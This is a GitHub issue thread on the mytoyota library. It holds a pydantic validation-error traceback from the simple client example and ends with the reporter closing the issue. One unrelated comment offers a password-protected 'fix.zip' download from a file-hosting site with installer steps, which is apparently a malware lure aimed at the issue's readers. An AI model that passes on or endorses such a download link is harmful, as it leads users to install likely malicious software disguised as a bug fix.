### ISSUE TITLE
Error when running simple_client_example.py

### ISSUE THREAD

**Issue by desosav** [DurgNomis-drol/mytoyota#368]
**Describe the bug**

The following error is displayed when running simple_client_example.py

Logging in...
Retrieving cars...
Traceback (most recent call last):
  File "/root/simple_client_example.py", line 73, in <module>
    loop.run_until_complete(get_information())
  File "/usr/lib/python3.11/asyncio/base_events.py", line 653, in run_until_complete
    return future.result()
           ^^^^^^^^^^^^^^^
  File "/root/simple_client_example.py", line 49, in get_information
    await car.update()
  File "/root/mytoyota/lib/python3.11/site-packages/mytoyota/models/vehicle.py", line 106, in update
    for name, data in await responses:
                      ^^^^^^^^^^^^^^^
  File "/root/mytoyota/lib/python3.11/site-packages/mytoyota/models/vehicle.py", line 100, in parallel_wrap                                                  per
    r = await function()
        ^^^^^^^^^^^^^^^^
  File "/root/mytoyota/lib/python3.11/site-packages/mytoyota/api.py", line 199, in get_notification_endpoin                                                  t
    parsed_response = await self._request_and_parse(
                      ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/root/mytoyota/lib/python3.11/site-packages/mytoyota/api.py", line 55, in _request_and_parse
    return model(**response)
           ^^^^^^^^^^^^^^^^^
  File "pydantic/main.py", line 341, in pydantic.main.BaseModel.__init__
pydantic.error_wrappers.ValidationError: 1 validation error for NotificationResponseModel
payload -> 0 -> notifications -> 4 -> vin
  none is not an allowed value (type=type_error.none.not_allowed)

**To Reproduce**

python simple_client_example.py

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by desosav** [comment]
Tested again today and it seems to be working.
I am closing this issue!
